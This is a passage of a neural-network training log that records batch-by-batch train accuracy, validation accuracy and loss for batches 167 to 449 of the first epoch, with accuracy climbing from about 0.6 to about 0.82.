Validation Accuracy: 0.623, Loss: 1.489\nEpoch 0 Batch 167/538 - Train Accuracy: 0.617, Validation Accuracy: 0.612, Loss: 1.483\nEpoch 0 Batch 168/538 - Train Accuracy: 0.602, Validation Accuracy: 0.625, Loss: 1.559\nEpoch 0 Batch 169/538 - Train Accuracy: 0.603, Validation Accuracy: 0.621, Loss: 1.567\nEpoch 0 Batch 170/538 - Train Accuracy: 0.623, Validation Accuracy: 0.614, Loss: 1.537\nEpoch 0 Batch 171/538 - Train Accuracy: 0.588, Validation Accuracy: 0.626, Loss: 1.539\nEpoch 0 Batch 172/538 - Train Accuracy: 0.610, Validation Accuracy: 0.624, Loss: 1.454\nEpoch 0 Batch 173/538 - Train Accuracy: 0.610, Validation Accuracy: 0.625, Loss: 1.476\nEpoch 0 Batch 174/538 - Train Accuracy: 0.583, Validation Accuracy: 0.608, Loss: 1.497\nEpoch 0 Batch 175/538 - Train Accuracy: 0.574, Validation Accuracy: 0.615, Loss: 1.501\nEpoch 0 Batch 176/538 - Train Accuracy: 0.605, Validation Accuracy: 0.629, Loss: 1.505\nEpoch 0 Batch 177/538 - Train Accuracy: 0.613, Validation Accuracy: 0.636, Loss: 1.454\nEpoch 0 Batch 178/538 - Train Accuracy: 0.637, Validation Accuracy: 0.633, Loss: 1.475\nEpoch 0 Batch 179/538 - Train Accuracy: 0.624, Validation Accuracy: 0.635, Loss: 1.568\nEpoch 0 Batch 180/538 - Train Accuracy: 0.658, Validation Accuracy: 0.642, Loss: 1.483\nEpoch 0 Batch 181/538 - Train Accuracy: 0.606, Validation Accuracy: 0.635, Loss: 1.500\nEpoch 0 Batch 182/538 - Train Accuracy: 0.597, Validation Accuracy: 0.620, Loss: 1.495\nEpoch 0 Batch 183/538 - Train Accuracy: 0.647, Validation Accuracy: 0.616, Loss: 1.457\nEpoch 0 Batch 184/538 - Train Accuracy: 0.627, Validation Accuracy: 0.611, Loss: 1.426\nEpoch 0 Batch 185/538 - Train Accuracy: 0.614, Validation Accuracy: 0.615, Loss: 1.434\nEpoch 0 Batch 186/538 - Train Accuracy: 0.616, Validation Accuracy: 0.623, Loss: 1.446\nEpoch 0 Batch 187/538 - Train Accuracy: 0.632, Validation Accuracy: 0.631, Loss: 1.444\nEpoch 0 Batch 188/538 - Train Accuracy: 0.612, Validation Accuracy: 0.640, Loss: 1.468\nEpoch 0 Batch 189/538 - Train Accuracy: 0.606, Validation Accuracy: 0.632, Loss: 1.491\nEpoch 0 Batch 190/538 - Train Accuracy: 0.626, Validation Accuracy: 0.629, Loss: 1.473\nEpoch 0 Batch 191/538 - Train Accuracy: 0.622, Validation Accuracy: 0.633, Loss: 1.462\nEpoch 0 Batch 192/538 - Train Accuracy: 0.623, Validation Accuracy: 0.637, Loss: 1.452\nEpoch 0 Batch 193/538 - Train Accuracy: 0.648, Validation Accuracy: 0.645, Loss: 1.435\nEpoch 0 Batch 194/538 - Train Accuracy: 0.611, Validation Accuracy: 0.646, Loss: 1.491\nEpoch 0 Batch 195/538 - Train Accuracy: 0.667, Validation Accuracy: 0.655, Loss: 1.456\nEpoch 0 Batch 196/538 - Train Accuracy: 0.642, Validation Accuracy: 0.655, Loss: 1.422\nEpoch 0 Batch 197/538 - Train Accuracy: 0.651, Validation Accuracy: 0.653, Loss: 1.419\nEpoch 0 Batch 198/538 - Train Accuracy: 0.652, Validation Accuracy: 0.654, Loss: 1.445\nEpoch 0 Batch 199/538 - Train Accuracy: 0.623, Validation Accuracy: 0.656, Loss: 1.445\nEpoch 0 Batch 200/538 - Train Accuracy: 0.654, Validation Accuracy: 0.640, Loss: 1.409\nEpoch 0 Batch 201/538 - Train Accuracy: 0.640, Validation Accuracy: 0.641, Loss: 1.466\nEpoch 0 Batch 202/538 - Train Accuracy: 0.632, Validation Accuracy: 0.625, Loss: 1.487\nEpoch 0 Batch 203/538 - Train Accuracy: 0.618, Validation Accuracy: 0.646, Loss: 1.463\nEpoch 0 Batch 204/538 - Train Accuracy: 0.627, Validation Accuracy: 0.661, Loss: 1.497\nEpoch 0 Batch 205/538 - Train Accuracy: 0.663, Validation Accuracy: 0.664, Loss: 1.415\nEpoch 0 Batch 206/538 - Train Accuracy: 0.608, Validation Accuracy: 0.625, Loss: 1.465\nEpoch 0 Batch 207/538 - Train Accuracy: 0.635, Validation Accuracy: 0.646, Loss: 1.409\nEpoch 0 Batch 208/538 - Train Accuracy: 0.635, Validation Accuracy: 0.630, Loss: 1.443\nEpoch 0 Batch 209/538 - Train Accuracy: 0.636, Validation Accuracy: 0.640, Loss: 1.443\nEpoch 0 Batch 210/538 - Train Accuracy: 0.627, Validation Accuracy: 0.657, Loss: 1.461\nEpoch 0 Batch 211/538 - Train Accuracy: 0.601, Validation Accuracy: 0.655, Loss: 1.450\nEpoch 0 Batch 212/538 - Train Accuracy: 0.644, Validation Accuracy: 0.661, Loss: 1.456\nEpoch 0 Batch 213/538 - Train Accuracy: 0.644, Validation Accuracy: 0.655, Loss: 1.419\nEpoch 0 Batch 214/538 - Train Accuracy: 0.635, Validation Accuracy: 0.652, Loss: 1.450\nEpoch 0 Batch 215/538 - Train Accuracy: 0.640, Validation Accuracy: 0.658, Loss: 1.471\nEpoch 0 Batch 216/538 - Train Accuracy: 0.620, Validation Accuracy: 0.635, Loss: 1.497\nEpoch 0 Batch 217/538 - Train Accuracy: 0.649, Validation Accuracy: 0.638, Loss: 1.389\nEpoch 0 Batch 218/538 - Train Accuracy: 0.618, Validation Accuracy: 0.642, Loss: 1.468\nEpoch 0 Batch 219/538 - Train Accuracy: 0.624, Validation Accuracy: 0.656, Loss: 1.493\nEpoch 0 Batch 220/538 - Train Accuracy: 0.636, Validation Accuracy: 0.657, Loss: 1.395\nEpoch 0 Batch 221/538 - Train Accuracy: 0.652, Validation Accuracy: 0.646, Loss: 1.350\nEpoch 0 Batch 222/538 - Train Accuracy: 0.652, Validation Accuracy: 0.647, Loss: 1.384\nEpoch 0 Batch 223/538 - Train Accuracy: 0.632, Validation Accuracy: 0.647, Loss: 1.450\nEpoch 0 Batch 224/538 - Train Accuracy: 0.619, Validation Accuracy: 0.640, Loss: 1.432\nEpoch 0 Batch 225/538 - Train Accuracy: 0.649, Validation Accuracy: 0.646, Loss: 1.393\nEpoch 0 Batch 226/538 - Train Accuracy: 0.643, Validation Accuracy: 0.658, Loss: 1.398\nEpoch 0 Batch 227/538 - Train Accuracy: 0.667, Validation Accuracy: 0.662, Loss: 1.392\nEpoch 0 Batch 228/538 - Train Accuracy: 0.643, Validation Accuracy: 0.675, Loss: 1.426\nEpoch 0 Batch 229/538 - Train Accuracy: 0.658, Validation Accuracy: 0.669, Loss: 1.433\nEpoch 0 Batch 230/538 - Train Accuracy: 0.640, Validation Accuracy: 0.677, Loss: 1.380\nEpoch 0 Batch 231/538 - Train Accuracy: 0.641, Validation Accuracy: 0.661, Loss: 1.409\nEpoch 0 Batch 232/538 - Train Accuracy: 0.639, Validation Accuracy: 0.661, Loss: 1.436\nEpoch 0 Batch 233/538 - Train Accuracy: 0.699, Validation Accuracy: 0.675, Loss: 1.349\nEpoch 0 Batch 234/538 - Train Accuracy: 0.634, Validation Accuracy: 0.667, Loss: 1.448\nEpoch 0 Batch 235/538 - Train Accuracy: 0.667, Validation Accuracy: 0.665, Loss: 1.383\nEpoch 0 Batch 236/538 - Train Accuracy: 0.635, Validation Accuracy: 0.665, Loss: 1.462\nEpoch 0 Batch 237/538 - Train Accuracy: 0.655, Validation Accuracy: 0.664, Loss: 1.339\nEpoch 0 Batch 238/538 - Train Accuracy: 0.677, Validation Accuracy: 0.667, Loss: 1.386\nEpoch 0 Batch 239/538 - Train Accuracy: 0.666, Validation Accuracy: 0.656, Loss: 1.407\nEpoch 0 Batch 240/538 - Train Accuracy: 0.649, Validation Accuracy: 0.652, Loss: 1.349\nEpoch 0 Batch 241/538 - Train Accuracy: 0.638, Validation Accuracy: 0.660, Loss: 1.394\nEpoch 0 Batch 242/538 - Train Accuracy: 0.671, Validation Accuracy: 0.669, Loss: 1.444\nEpoch 0 Batch 243/538 - Train Accuracy: 0.640, Validation Accuracy: 0.667, Loss: 1.406\nEpoch 0 Batch 244/538 - Train Accuracy: 0.662, Validation Accuracy: 0.674, Loss: 1.417\nEpoch 0 Batch 245/538 - Train Accuracy: 0.655, Validation Accuracy: 0.671, Loss: 1.400\nEpoch 0 Batch 246/538 - Train Accuracy: 0.681, Validation Accuracy: 0.677, Loss: 1.336\nEpoch 0 Batch 247/538 - Train Accuracy: 0.662, Validation Accuracy: 0.674, Loss: 1.390\nEpoch 0 Batch 248/538 - Train Accuracy: 0.664, Validation Accuracy: 0.681, Loss: 1.367\nEpoch 0 Batch 249/538 - Train Accuracy: 0.682, Validation Accuracy: 0.673, Loss: 1.393\nEpoch 0 Batch 250/538 - Train Accuracy: 0.662, Validation Accuracy: 0.660, Loss: 1.406\nEpoch 0 Batch 251/538 - Train Accuracy: 0.672, Validation Accuracy: 0.662, Loss: 1.402\nEpoch 0 Batch 252/538 - Train Accuracy: 0.700, Validation Accuracy: 0.649, Loss: 1.388\nEpoch 0 Batch 253/538 - Train Accuracy: 0.651, Validation Accuracy: 0.652, Loss: 1.403\nEpoch 0 Batch 254/538 - Train Accuracy: 0.646, Validation Accuracy: 0.657, Loss: 1.372\nEpoch 0 Batch 255/538 - Train Accuracy: 0.665, Validation Accuracy: 0.673, Loss: 1.418\nEpoch 0 Batch 256/538 - Train Accuracy: 0.678, Validation Accuracy: 0.689, Loss: 1.388\nEpoch 0 Batch 257/538 - Train Accuracy: 0.698, Validation Accuracy: 0.701, Loss: 1.372\nEpoch 0 Batch 258/538 - Train Accuracy: 0.694, Validation Accuracy: 0.693, Loss: 1.416\nEpoch 0 Batch 259/538 - Train Accuracy: 0.705, Validation Accuracy: 0.688, Loss: 1.350\nEpoch 0 Batch 260/538 - Train Accuracy: 0.686, Validation Accuracy: 0.683, Loss: 1.357\nEpoch 0 Batch 261/538 - Train Accuracy: 0.683, Validation Accuracy: 0.662, Loss: 1.439\nEpoch 0 Batch 262/538 - Train Accuracy: 0.667, Validation Accuracy: 0.665, Loss: 1.380\nEpoch 0 Batch 263/538 - Train Accuracy: 0.673, Validation Accuracy: 0.656, Loss: 1.308\nEpoch 0 Batch 264/538 - Train Accuracy: 0.678, Validation Accuracy: 0.669, Loss: 1.405\nEpoch 0 Batch 265/538 - Train Accuracy: 0.648, Validation Accuracy: 0.675, Loss: 1.436\nEpoch 0 Batch 266/538 - Train Accuracy: 0.688, Validation Accuracy: 0.677, Loss: 1.352\nEpoch 0 Batch 267/538 - Train Accuracy: 0.700, Validation Accuracy: 0.682, Loss: 1.375\nEpoch 0 Batch 268/538 - Train Accuracy: 0.706, Validation Accuracy: 0.694, Loss: 1.386\nEpoch 0 Batch 269/538 - Train Accuracy: 0.686, Validation Accuracy: 0.691, Loss: 1.364\nEpoch 0 Batch 270/538 - Train Accuracy: 0.671, Validation Accuracy: 0.681, Loss: 1.352\nEpoch 0 Batch 271/538 - Train Accuracy: 0.690, Validation Accuracy: 0.691, Loss: 1.351\nEpoch 0 Batch 272/538 - Train Accuracy: 0.682, Validation Accuracy: 0.704, Loss: 1.388\nEpoch 0 Batch 273/538 - Train Accuracy: 0.697, Validation Accuracy: 0.702, Loss: 1.357\nEpoch 0 Batch 274/538 - Train Accuracy: 0.683, Validation Accuracy: 0.709, Loss: 1.362\nEpoch 0 Batch 275/538 - Train Accuracy: 0.701, Validation Accuracy: 0.711, Loss: 1.407\nEpoch 0 Batch 276/538 - Train Accuracy: 0.720, Validation Accuracy: 0.715, Loss: 1.349\nEpoch 0 Batch 277/538 - Train Accuracy: 0.710, Validation Accuracy: 0.710, Loss: 1.375\nEpoch 0 Batch 278/538 - Train Accuracy: 0.705, Validation Accuracy: 0.713, Loss: 1.339\nEpoch 0 Batch 279/538 - Train Accuracy: 0.696, Validation Accuracy: 0.711, Loss: 1.340\nEpoch 0 Batch 280/538 - Train Accuracy: 0.731, Validation Accuracy: 0.706, Loss: 1.325\nEpoch 0 Batch 281/538 - Train Accuracy: 0.696, Validation Accuracy: 0.702, Loss: 1.374\nEpoch 0 Batch 282/538 - Train Accuracy: 0.707, Validation Accuracy: 0.705, Loss: 1.299\nEpoch 0 Batch 283/538 - Train Accuracy: 0.727, Validation Accuracy: 0.702, Loss: 1.360\nEpoch 0 Batch 284/538 - Train Accuracy: 0.709, Validation Accuracy: 0.712, Loss: 1.382\nEpoch 0 Batch 285/538 - Train Accuracy: 0.721, Validation Accuracy: 0.706, Loss: 1.311\nEpoch 0 Batch 286/538 - Train Accuracy: 0.713, Validation Accuracy: 0.705, Loss: 1.308\nEpoch 0 Batch 287/538 - Train Accuracy: 0.717, Validation Accuracy: 0.710, Loss: 1.286\nEpoch 0 Batch 288/538 - Train Accuracy: 0.707, Validation Accuracy: 0.710, Loss: 1.283\nEpoch 0 Batch 289/538 - Train Accuracy: 0.730, Validation Accuracy: 0.700, Loss: 1.343\nEpoch 0 Batch 290/538 - Train Accuracy: 0.712, Validation Accuracy: 0.705, Loss: 1.319\nEpoch 0 Batch 291/538 - Train Accuracy: 0.711, Validation Accuracy: 0.704, Loss: 1.287\nEpoch 0 Batch 292/538 - Train Accuracy: 0.718, Validation Accuracy: 0.708, Loss: 1.313\nEpoch 0 Batch 293/538 - Train Accuracy: 0.711, Validation Accuracy: 0.711, Loss: 1.322\nEpoch 0 Batch 294/538 - Train Accuracy: 0.682, Validation Accuracy: 0.710, Loss: 1.381\nEpoch 0 Batch 295/538 - Train Accuracy: 0.727, Validation Accuracy: 0.704, Loss: 1.276\nEpoch 0 Batch 296/538 - Train Accuracy: 0.706, Validation Accuracy: 0.718, Loss: 1.345\nEpoch 0 Batch 297/538 - Train Accuracy: 0.707, Validation Accuracy: 0.727, Loss: 1.314\nEpoch 0 Batch 298/538 - Train Accuracy: 0.722, Validation Accuracy: 0.730, Loss: 1.325\nEpoch 0 Batch 299/538 - Train Accuracy: 0.720, Validation Accuracy: 0.725, Loss: 1.304\nEpoch 0 Batch 300/538 - Train Accuracy: 0.739, Validation Accuracy: 0.719, Loss: 1.313\nEpoch 0 Batch 301/538 - Train Accuracy: 0.721, Validation Accuracy: 0.723, Loss: 1.262\nEpoch 0 Batch 302/538 - Train Accuracy: 0.751, Validation Accuracy: 0.731, Loss: 1.283\nEpoch 0 Batch 303/538 - Train Accuracy: 0.752, Validation Accuracy: 0.727, Loss: 1.285\nEpoch 0 Batch 304/538 - Train Accuracy: 0.730, Validation Accuracy: 0.726, Loss: 1.286\nEpoch 0 Batch 305/538 - Train Accuracy: 0.729, Validation Accuracy: 0.722, Loss: 1.299\nEpoch 0 Batch 306/538 - Train Accuracy: 0.735, Validation Accuracy: 0.721, Loss: 1.284\nEpoch 0 Batch 307/538 - Train Accuracy: 0.710, Validation Accuracy: 0.729, Loss: 1.271\nEpoch 0 Batch 308/538 - Train Accuracy: 0.735, Validation Accuracy: 0.725, Loss: 1.317\nEpoch 0 Batch 309/538 - Train Accuracy: 0.742, Validation Accuracy: 0.721, Loss: 1.313\nEpoch 0 Batch 310/538 - Train Accuracy: 0.741, Validation Accuracy: 0.716, Loss: 1.328\nEpoch 0 Batch 311/538 - Train Accuracy: 0.746, Validation Accuracy: 0.711, Loss: 1.310\nEpoch 0 Batch 312/538 - Train Accuracy: 0.754, Validation Accuracy: 0.729, Loss: 1.237\nEpoch 0 Batch 313/538 - Train Accuracy: 0.720, Validation Accuracy: 0.721, Loss: 1.286\nEpoch 0 Batch 314/538 - Train Accuracy: 0.719, Validation Accuracy: 0.724, Loss: 1.291\nEpoch 0 Batch 315/538 - Train Accuracy: 0.715, Validation Accuracy: 0.725, Loss: 1.275\nEpoch 0 Batch 316/538 - Train Accuracy: 0.729, Validation Accuracy: 0.725, Loss: 1.255\nEpoch 0 Batch 317/538 - Train Accuracy: 0.741, Validation Accuracy: 0.728, Loss: 1.235\nEpoch 0 Batch 318/538 - Train Accuracy: 0.721, Validation Accuracy: 0.733, Loss: 1.299\nEpoch 0 Batch 319/538 - Train Accuracy: 0.737, Validation Accuracy: 0.719, Loss: 1.295\nEpoch 0 Batch 320/538 - Train Accuracy: 0.707, Validation Accuracy: 0.730, Loss: 1.271\nEpoch 0 Batch 321/538 - Train Accuracy: 0.746, Validation Accuracy: 0.746, Loss: 1.217\nEpoch 0 Batch 322/538 - Train Accuracy: 0.742, Validation Accuracy: 0.754, Loss: 1.348\nEpoch 0 Batch 323/538 - Train Accuracy: 0.754, Validation Accuracy: 0.739, Loss: 1.246\nEpoch 0 Batch 324/538 - Train Accuracy: 0.716, Validation Accuracy: 0.736, Loss: 1.272\nEpoch 0 Batch 325/538 - Train Accuracy: 0.765, Validation Accuracy: 0.733, Loss: 1.257\nEpoch 0 Batch 326/538 - Train Accuracy: 0.733, Validation Accuracy: 0.743, Loss: 1.264\nEpoch 0 Batch 327/538 - Train Accuracy: 0.727, Validation Accuracy: 0.737, Loss: 1.263\nEpoch 0 Batch 328/538 - Train Accuracy: 0.753, Validation Accuracy: 0.723, Loss: 1.242\nEpoch 0 Batch 329/538 - Train Accuracy: 0.766, Validation Accuracy: 0.743, Loss: 1.330\nEpoch 0 Batch 330/538 - Train Accuracy: 0.748, Validation Accuracy: 0.739, Loss: 1.288\nEpoch 0 Batch 331/538 - Train Accuracy: 0.729, Validation Accuracy: 0.736, Loss: 1.289\nEpoch 0 Batch 332/538 - Train Accuracy: 0.750, Validation Accuracy: 0.747, Loss: 1.263\nEpoch 0 Batch 333/538 - Train Accuracy: 0.730, Validation Accuracy: 0.729, Loss: 1.277\nEpoch 0 Batch 334/538 - Train Accuracy: 0.755, Validation Accuracy: 0.744, Loss: 1.274\nEpoch 0 Batch 335/538 - Train Accuracy: 0.776, Validation Accuracy: 0.756, Loss: 1.265\nEpoch 0 Batch 336/538 - Train Accuracy: 0.773, Validation Accuracy: 0.761, Loss: 1.246\nEpoch 0 Batch 337/538 - Train Accuracy: 0.750, Validation Accuracy: 0.756, Loss: 1.264\nEpoch 0 Batch 338/538 - Train Accuracy: 0.737, Validation Accuracy: 0.758, Loss: 1.248\nEpoch 0 Batch 339/538 - Train Accuracy: 0.754, Validation Accuracy: 0.770, Loss: 1.250\nEpoch 0 Batch 340/538 - Train Accuracy: 0.751, Validation Accuracy: 0.766, Loss: 1.315\nEpoch 0 Batch 341/538 - Train Accuracy: 0.769, Validation Accuracy: 0.770, Loss: 1.262\nEpoch 0 Batch 342/538 - Train Accuracy: 0.774, Validation Accuracy: 0.780, Loss: 1.240\nEpoch 0 Batch 343/538 - Train Accuracy: 0.777, Validation Accuracy: 0.778, Loss: 1.299\nEpoch 0 Batch 344/538 - Train Accuracy: 0.787, Validation Accuracy: 0.774, Loss: 1.225\nEpoch 0 Batch 345/538 - Train Accuracy: 0.774, Validation Accuracy: 0.768, Loss: 1.183\nEpoch 0 Batch 346/538 - Train Accuracy: 0.753, Validation Accuracy: 0.775, Loss: 1.272\nEpoch 0 Batch 347/538 - Train Accuracy: 0.769, Validation Accuracy: 0.773, Loss: 1.277\nEpoch 0 Batch 348/538 - Train Accuracy: 0.776, Validation Accuracy: 0.768, Loss: 1.194\nEpoch 0 Batch 349/538 - Train Accuracy: 0.761, Validation Accuracy: 0.768, Loss: 1.261\nEpoch 0 Batch 350/538 - Train Accuracy: 0.778, Validation Accuracy: 0.773, Loss: 1.242\nEpoch 0 Batch 351/538 - Train Accuracy: 0.748, Validation Accuracy: 0.764, Loss: 1.239\nEpoch 0 Batch 352/538 - Train Accuracy: 0.764, Validation Accuracy: 0.746, Loss: 1.302\nEpoch 0 Batch 353/538 - Train Accuracy: 0.759, Validation Accuracy: 0.728, Loss: 1.246\nEpoch 0 Batch 354/538 - Train Accuracy: 0.753, Validation Accuracy: 0.732, Loss: 1.284\nEpoch 0 Batch 355/538 - Train Accuracy: 0.769, Validation Accuracy: 0.758, Loss: 1.277\nEpoch 0 Batch 356/538 - Train Accuracy: 0.778, Validation Accuracy: 0.762, Loss: 1.243\nEpoch 0 Batch 357/538 - Train Accuracy: 0.785, Validation Accuracy: 0.765, Loss: 1.214\nEpoch 0 Batch 358/538 - Train Accuracy: 0.776, Validation Accuracy: 0.772, Loss: 1.208\nEpoch 0 Batch 359/538 - Train Accuracy: 0.772, Validation Accuracy: 0.772, Loss: 1.253\nEpoch 0 Batch 360/538 - Train Accuracy: 0.774, Validation Accuracy: 0.775, Loss: 1.224\nEpoch 0 Batch 361/538 - Train Accuracy: 0.789, Validation Accuracy: 0.781, Loss: 1.230\nEpoch 0 Batch 362/538 - Train Accuracy: 0.795, Validation Accuracy: 0.758, Loss: 1.222\nEpoch 0 Batch 363/538 - Train Accuracy: 0.763, Validation Accuracy: 0.758, Loss: 1.213\nEpoch 0 Batch 364/538 - Train Accuracy: 0.775, Validation Accuracy: 0.771, Loss: 1.284\nEpoch 0 Batch 365/538 - Train Accuracy: 0.771, Validation Accuracy: 0.768, Loss: 1.218\nEpoch 0 Batch 366/538 - Train Accuracy: 0.780, Validation Accuracy: 0.759, Loss: 1.249\nEpoch 0 Batch 367/538 - Train Accuracy: 0.767, Validation Accuracy: 0.762, Loss: 1.156\nEpoch 0 Batch 368/538 - Train Accuracy: 0.798, Validation Accuracy: 0.757, Loss: 1.257\nEpoch 0 Batch 369/538 - Train Accuracy: 0.776, Validation Accuracy: 0.767, Loss: 1.170\nEpoch 0 Batch 370/538 - Train Accuracy: 0.790, Validation Accuracy: 0.785, Loss: 1.223\nEpoch 0 Batch 371/538 - Train Accuracy: 0.790, Validation Accuracy: 0.782, Loss: 1.219\nEpoch 0 Batch 372/538 - Train Accuracy: 0.794, Validation Accuracy: 0.775, Loss: 1.248\nEpoch 0 Batch 373/538 - Train Accuracy: 0.784, Validation Accuracy: 0.773, Loss: 1.238\nEpoch 0 Batch 374/538 - Train Accuracy: 0.776, Validation Accuracy: 0.775, Loss: 1.197\nEpoch 0 Batch 375/538 - Train Accuracy: 0.786, Validation Accuracy: 0.770, Loss: 1.203\nEpoch 0 Batch 376/538 - Train Accuracy: 0.746, Validation Accuracy: 0.760, Loss: 1.195\nEpoch 0 Batch 377/538 - Train Accuracy: 0.769, Validation Accuracy: 0.770, Loss: 1.200\nEpoch 0 Batch 378/538 - Train Accuracy: 0.799, Validation Accuracy: 0.773, Loss: 1.238\nEpoch 0 Batch 379/538 - Train Accuracy: 0.801, Validation Accuracy: 0.785, Loss: 1.180\nEpoch 0 Batch 380/538 - Train Accuracy: 0.793, Validation Accuracy: 0.788, Loss: 1.189\nEpoch 0 Batch 381/538 - Train Accuracy: 0.781, Validation Accuracy: 0.793, Loss: 1.218\nEpoch 0 Batch 382/538 - Train Accuracy: 0.770, Validation Accuracy: 0.793, Loss: 1.225\nEpoch 0 Batch 383/538 - Train Accuracy: 0.772, Validation Accuracy: 0.790, Loss: 1.158\nEpoch 0 Batch 384/538 - Train Accuracy: 0.791, Validation Accuracy: 0.789, Loss: 1.213\nEpoch 0 Batch 385/538 - Train Accuracy: 0.796, Validation Accuracy: 0.791, Loss: 1.218\nEpoch 0 Batch 386/538 - Train Accuracy: 0.785, Validation Accuracy: 0.797, Loss: 1.182\nEpoch 0 Batch 387/538 - Train Accuracy: 0.794, Validation Accuracy: 0.799, Loss: 1.169\nEpoch 0 Batch 388/538 - Train Accuracy: 0.806, Validation Accuracy: 0.798, Loss: 1.215\nEpoch 0 Batch 389/538 - Train Accuracy: 0.778, Validation Accuracy: 0.795, Loss: 1.238\nEpoch 0 Batch 390/538 - Train Accuracy: 0.806, Validation Accuracy: 0.790, Loss: 1.158\nEpoch 0 Batch 391/538 - Train Accuracy: 0.801, Validation Accuracy: 0.792, Loss: 1.122\nEpoch 0 Batch 392/538 - Train Accuracy: 0.773, Validation Accuracy: 0.791, Loss: 1.190\nEpoch 0 Batch 393/538 - Train Accuracy: 0.811, Validation Accuracy: 0.795, Loss: 1.122\nEpoch 0 Batch 394/538 - Train Accuracy: 0.744, Validation Accuracy: 0.790, Loss: 1.215\nEpoch 0 Batch 395/538 - Train Accuracy: 0.779, Validation Accuracy: 0.788, Loss: 1.244\nEpoch 0 Batch 396/538 - Train Accuracy: 0.806, Validation Accuracy: 0.797, Loss: 1.199\nEpoch 0 Batch 397/538 - Train Accuracy: 0.796, Validation Accuracy: 0.785, Loss: 1.216\nEpoch 0 Batch 398/538 - Train Accuracy: 0.799, Validation Accuracy: 0.784, Loss: 1.194\nEpoch 0 Batch 399/538 - Train Accuracy: 0.759, Validation Accuracy: 0.786, Loss: 1.227\nEpoch 0 Batch 400/538 - Train Accuracy: 0.789, Validation Accuracy: 0.787, Loss: 1.182\nEpoch 0 Batch 401/538 - Train Accuracy: 0.788, Validation Accuracy: 0.786, Loss: 1.229\nEpoch 0 Batch 402/538 - Train Accuracy: 0.794, Validation Accuracy: 0.789, Loss: 1.165\nEpoch 0 Batch 403/538 - Train Accuracy: 0.789, Validation Accuracy: 0.784, Loss: 1.187\nEpoch 0 Batch 404/538 - Train Accuracy: 0.802, Validation Accuracy: 0.769, Loss: 1.184\nEpoch 0 Batch 405/538 - Train Accuracy: 0.797, Validation Accuracy: 0.767, Loss: 1.155\nEpoch 0 Batch 406/538 - Train Accuracy: 0.783, Validation Accuracy: 0.785, Loss: 1.197\nEpoch 0 Batch 407/538 - Train Accuracy: 0.805, Validation Accuracy: 0.780, Loss: 1.223\nEpoch 0 Batch 408/538 - Train Accuracy: 0.784, Validation Accuracy: 0.792, Loss: 1.177\nEpoch 0 Batch 409/538 - Train Accuracy: 0.785, Validation Accuracy: 0.792, Loss: 1.154\nEpoch 0 Batch 410/538 - Train Accuracy: 0.802, Validation Accuracy: 0.805, Loss: 1.148\nEpoch 0 Batch 411/538 - Train Accuracy: 0.818, Validation Accuracy: 0.809, Loss: 1.181\nEpoch 0 Batch 412/538 - Train Accuracy: 0.801, Validation Accuracy: 0.798, Loss: 1.154\nEpoch 0 Batch 413/538 - Train Accuracy: 0.802, Validation Accuracy: 0.792, Loss: 1.204\nEpoch 0 Batch 414/538 - Train Accuracy: 0.773, Validation Accuracy: 0.790, Loss: 1.211\nEpoch 0 Batch 415/538 - Train Accuracy: 0.798, Validation Accuracy: 0.813, Loss: 1.187\nEpoch 0 Batch 416/538 - Train Accuracy: 0.804, Validation Accuracy: 0.809, Loss: 1.138\nEpoch 0 Batch 417/538 - Train Accuracy: 0.823, Validation Accuracy: 0.811, Loss: 1.182\nEpoch 0 Batch 418/538 - Train Accuracy: 0.806, Validation Accuracy: 0.813, Loss: 1.172\nEpoch 0 Batch 419/538 - Train Accuracy: 0.803, Validation Accuracy: 0.815, Loss: 1.195\nEpoch 0 Batch 420/538 - Train Accuracy: 0.825, Validation Accuracy: 0.802, Loss: 1.208\nEpoch 0 Batch 421/538 - Train Accuracy: 0.805, Validation Accuracy: 0.803, Loss: 1.128\nEpoch 0 Batch 422/538 - Train Accuracy: 0.813, Validation Accuracy: 0.801, Loss: 1.167\nEpoch 0 Batch 423/538 - Train Accuracy: 0.820, Validation Accuracy: 0.802, Loss: 1.179\nEpoch 0 Batch 424/538 - Train Accuracy: 0.795, Validation Accuracy: 0.803, Loss: 1.174\nEpoch 0 Batch 425/538 - Train Accuracy: 0.806, Validation Accuracy: 0.806, Loss: 1.141\nEpoch 0 Batch 426/538 - Train Accuracy: 0.806, Validation Accuracy: 0.809, Loss: 1.149\nEpoch 0 Batch 427/538 - Train Accuracy: 0.799, Validation Accuracy: 0.811, Loss: 1.189\nEpoch 0 Batch 428/538 - Train Accuracy: 0.817, Validation Accuracy: 0.815, Loss: 1.125\nEpoch 0 Batch 429/538 - Train Accuracy: 0.829, Validation Accuracy: 0.812, Loss: 1.134\nEpoch 0 Batch 430/538 - Train Accuracy: 0.799, Validation Accuracy: 0.807, Loss: 1.174\nEpoch 0 Batch 431/538 - Train Accuracy: 0.825, Validation Accuracy: 0.803, Loss: 1.160\nEpoch 0 Batch 432/538 - Train Accuracy: 0.817, Validation Accuracy: 0.804, Loss: 1.156\nEpoch 0 Batch 433/538 - Train Accuracy: 0.781, Validation Accuracy: 0.795, Loss: 1.198\nEpoch 0 Batch 434/538 - Train Accuracy: 0.792, Validation Accuracy: 0.801, Loss: 1.164\nEpoch 0 Batch 435/538 - Train Accuracy: 0.821, Validation Accuracy: 0.802, Loss: 1.191\nEpoch 0 Batch 436/538 - Train Accuracy: 0.789, Validation Accuracy: 0.808, Loss: 1.146\nEpoch 0 Batch 437/538 - Train Accuracy: 0.826, Validation Accuracy: 0.816, Loss: 1.176\nEpoch 0 Batch 438/538 - Train Accuracy: 0.825, Validation Accuracy: 0.811, Loss: 1.172\nEpoch 0 Batch 439/538 - Train Accuracy: 0.823, Validation Accuracy: 0.816, Loss: 1.169\nEpoch 0 Batch 440/538 - Train Accuracy: 0.821, Validation Accuracy: 0.811, Loss: 1.167\nEpoch 0 Batch 441/538 - Train Accuracy: 0.811, Validation Accuracy: 0.807, Loss: 1.151\nEpoch 0 Batch 442/538 - Train Accuracy: 0.825, Validation Accuracy: 0.802, Loss: 1.153\nEpoch 0 Batch 443/538 - Train Accuracy: 0.795, Validation Accuracy: 0.793, Loss: 1.168\nEpoch 0 Batch 444/538 - Train Accuracy: 0.834, Validation Accuracy: 0.785, Loss: 1.139\nEpoch 0 Batch 445/538 - Train Accuracy: 0.841, Validation Accuracy: 0.794, Loss: 1.177\nEpoch 0 Batch 446/538 - Train Accuracy: 0.805, Validation Accuracy: 0.790, Loss: 1.156\nEpoch 0 Batch 447/538 - Train Accuracy: 0.782, Validation Accuracy: 0.809, Loss: 1.157\nEpoch 0 Batch 448/538 - Train Accuracy: 0.816, Validation Accuracy: 0.817, Loss: 1.130\nEpoch 0 Batch 449/538 - Train Accuracy: 0.826, 